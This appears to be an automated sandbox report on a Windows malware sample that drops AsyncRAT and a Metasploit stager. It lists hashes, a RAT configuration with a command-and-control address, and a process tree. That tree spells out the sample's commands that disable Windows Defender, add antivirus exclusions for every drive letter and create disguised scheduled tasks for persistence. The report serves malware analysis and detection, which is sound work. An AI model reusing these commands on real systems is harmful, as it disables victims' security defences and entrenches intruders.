Analysis
- max time kernel: 147s
- max time network: 144s
- platform: windows7_x64
- resource: win7-20240729-en
- resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
- submitted: 26/03/2025, 19:14
- Static task: static1
- Behavioral task: behavioral1
  - Sample: 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe
  - Resource: win7-20240729-en
- Behavioral task: behavioral2
  - Sample: 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe
  - Resource: win10v2004-20250314-en

General
- Target: 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe
- Size: 13.0MB
- MD5: 66f293c1394e81b02da06a86f5bcb249
- SHA1: ac0b8acc5eb9395d6a8a40be01a3e75a7208e23c
- SHA256: 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22
- SHA512: b3bd8252473e9960cdf32d3d89e6f1df3ced96621ae12d085e58705dd12803d5a3e90e1a6899545921f7f32f2bf9072fd26d147a0dd2fb4d3edc21f0a756ca1e
- SSDEEP: 393216:mtoHOLHsaSZ2pczKc1esHdZYjzGLO51D6GCoJ:NOL7mH9ZEN5h6RE
Malware Config
- Extracted: asyncrat
  - Default: 127.0.0.1:3001, 108.252.227.16:3001
  - delay: 1
  - install: true
  - install_file: dsg$4yt.exe
  - install_folder: %AppData%
- Extracted: metasploit
  - metasploit_stager: 0.0.0.0:3000
Signatures
- Asyncrat family
- MetaSploit
  Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
- Metasploit family
- Modifies Windows Defender DisableAntiSpyware settings
  - Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" (reg.exe)
- Modifies Windows Defender Real-time Protection settings (3 TTPs, 2 IoCs)
  - Key created: \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
  - Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" (reg.exe)
- Async RAT payload (1 IoC)
  - resource behavioral1/files/0x0007000000018780-12.dat matched yara_rule family_asyncrat
- Command and Scripting Interpreter: PowerShell (1 TTP, 26 IoCs)
  Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
  - powershell.exe PIDs: 3012, 1632, 2828, 2992, 1696, 2292, 2864, 2608, 2420, 2752, 2928, 2196, 1136, 2176, 1368, 1332, 2212, 2376, 572, 2472, 1428, 908, 1028, 1676, 876, 2556
- Executes dropped EXE (5 IoCs)
  - 2748 HOlC2.1.exe; 2940 svchost.exe; 2660 HOIC.2.1.exe; 1332 dsg$4yt.exe; 2064 Anti Malware Service.exe
- Loads dropped DLL (4 IoCs)
  - 2328 00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe; 2652 Process not Found; 1812 cmd.exe; 1812 cmd.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTP, 1 IoC)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (HOIC.2.1.exe)
- Delays execution with timeout.exe (1 IoC)
  - 1172 timeout.exe
- Scheduled Task/Job: Scheduled Task (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  - 3004 schtasks.exe; 760 schtasks.exe
- Suspicious behavior: EnumeratesProcesses (28 IoCs)
  - powershell.exe PIDs: 1332, 1632, 2828, 2212, 2376, 572, 1676, 2992, 1696, 2472, 1428, 876, 2556, 2752, 3012, 2864, 908, 2608, 2928, 2420, 2196, 1136, 1028, 2176, 1368
  - svchost.exe PID 2940 (3 entries)
- Suspicious use of AdjustPrivilegeToken (27 IoCs)
  - Token: SeDebugPrivilege, powershell.exe PIDs: 1332, 1632, 2828, 2212, 2376, 572, 1676, 2992, 1696, 2472, 1428, 876, 2556, 2752, 3012, 2864, 908, 2608, 2928, 2420, 2196, 1136, 1028, 2176, 1368
  - Token: SeDebugPrivilege, svchost.exe PID 2940
  - Token: SeDebugPrivilege, dsg$4yt.exe PID 1332
- Suspicious use of WriteProcessMemory (64 IoCs)
  Source PID (process) -> target PID, procid_target, number of entries:
  - 2328 (00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe) -> 2748, procid_target 30, 3 entries
  - 2328 (00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe) -> 2940, procid_target 32, 3 entries
  - 2748 (HOlC2.1.exe) -> 2812, procid_target 33, 3 entries
  - 2748 (HOlC2.1.exe) -> 2908, procid_target 34, 3 entries
  - 2748 (HOlC2.1.exe) -> 3064, procid_target 35, 3 entries
  - 3064 (cmd.exe) -> 760, procid_target 36, 3 entries
  - 2328 (00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe) -> 2660, procid_target 37, 4 entries
  - 2748 (HOlC2.1.exe) -> 892, procid_target 81, 3 entries
  - 892 (cmd.exe) -> 556, procid_target 39, 3 entries
  - 2748 (HOlC2.1.exe) -> 1688, procid_target 40, 3 entries
  - 1688 (cmd.exe) -> 2864, procid_target 82, 3 entries
  - 2748 (HOlC2.1.exe) -> 2916, procid_target 42, 3 entries
  - 2916 (cmd.exe) -> 1332, procid_target 85, 3 entries
  - 2748 (HOlC2.1.exe) -> 2964, procid_target 86, 3 entries
  - 2964 (cmd.exe) -> 1632, procid_target 45, 3 entries
  - 2748 (HOlC2.1.exe) -> 2336, procid_target 88, 3 entries
  - 2336 (cmd.exe) -> 2828, procid_target 47, 3 entries
  - 2748 (HOlC2.1.exe) -> 2852, procid_target 48, 3 entries
  - 2852 (cmd.exe) -> 2212, procid_target 49, 3 entries
  - 2748 (HOlC2.1.exe) -> 2196, procid_target 93, 3 entries
  - 2196 (cmd.exe) -> 2376, procid_target 92, 3 entries
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- PID 2328: C:\Users\Admin\AppData\Local\Temp\00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe"
  signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - PID 2748: C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe"
    signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - PID 2812: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Windows Defender"
    - PID 2908: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c COPY "C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe" "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe"
    - PID 3064: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
      signatures: Suspicious use of WriteProcessMemory
      - PID 760: C:\Windows\system32\schtasks.exe
        command line: SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
        signatures: Scheduled Task/Job: Scheduled Task
    - PID 892: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
      signatures: Suspicious use of WriteProcessMemory
      - PID 556: C:\Windows\system32\reg.exe
        command line: reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
        signatures: Modifies Windows Defender DisableAntiSpyware settings
    - PID 1688: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
      signatures: Suspicious use of WriteProcessMemory
      - PID 2864: C:\Windows\system32\reg.exe
        command line: reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
        signatures: Modifies Windows Defender Real-time Protection settings
    - PID 2916: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
      signatures: Suspicious use of WriteProcessMemory
      - PID 1332: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 2964: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
      signatures: Suspicious use of WriteProcessMemory
      - PID 1632: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 2336: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
      signatures: Suspicious use of WriteProcessMemory
      - PID 2828: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 2852: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
      signatures: Suspicious use of WriteProcessMemory
      - PID 2212: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 2196: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
      signatures: Suspicious use of WriteProcessMemory
      - PID 2376: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 1148: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
      - PID 572: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 1020: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
      - PID 1676: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 1816: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
      - PID 2992: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 2364: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
      - PID 1696: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 2308: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
      - PID 2472: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 2456: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
      - PID 1428: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 1312: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
      - PID 876: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 1140: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
      - PID 2292: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell
    - PID 2680: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
      - PID 2556: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 2804: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
      - PID 2752: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 2676: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
      - PID 3012: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 892: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
      - PID 2864: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 1748: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
      - PID 908: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 2964: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
      - PID 2608: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 2336: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
      - PID 2928: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 2832: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
      - PID 2420: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 2376: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
      - PID 2196: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 3048: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
      - PID 1136: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 2988: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
      - PID 1028: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 628: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
      - PID 2176: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 1020: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
      - PID 1368: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 1812: C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
      signatures: Loads dropped DLL
      - PID 2064: C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
        command line: "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
        signatures: Executes dropped EXE
        - PID 1740: C:\Windows\system32\rundll32.exe
          command line: rundll32
  - PID 2940: C:\Users\Admin\AppData\Local\Temp\svchost.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - PID 2116: C:\Windows\System32\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dsg$4yt" /tr '"C:\Users\Admin\AppData\Roaming\dsg$4yt.exe"' & exit
      - PID 3004: C:\Windows\system32\schtasks.exe
        command line: schtasks /create /f /sc onlogon /rl highest /tn "dsg$4yt" /tr '"C:\Users\Admin\AppData\Roaming\dsg$4yt.exe"'
        signatures: Scheduled Task/Job: Scheduled Task
    - PID 944: C:\Windows\system32\cmd.exe
      command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp4AC6.tmp.bat""
      - PID 1172: C:\Windows\system32\timeout.exe
        command line: timeout 3
        signatures: Delays execution with timeout.exe
      - PID 1332: C:\Users\Admin\AppData\Roaming\dsg$4yt.exe
        command line: "C:\Users\Admin\AppData\Roaming\dsg$4yt.exe"
        signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
  - PID 2660: C:\Users\Admin\AppData\Local\Temp\HOIC.2.1.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\HOIC.2.1.exe"
    signatures: Executes dropped EXE; System Location Discovery: System Language Discovery
Network
MITRE ATT&CK Enterprise v15
- Execution
  - Command and Scripting Interpreter (1): PowerShell (1)
  - Scheduled Task/Job (1): Scheduled Task (1)
- Persistence
  - Create or Modify System Process (2): Windows Service (2)
  - Scheduled Task/Job (1): Scheduled Task (1)
- Privilege Escalation
  - Create or Modify System Process (2): Windows Service (2)
  - Scheduled Task/Job (1): Scheduled Task (1)
Downloads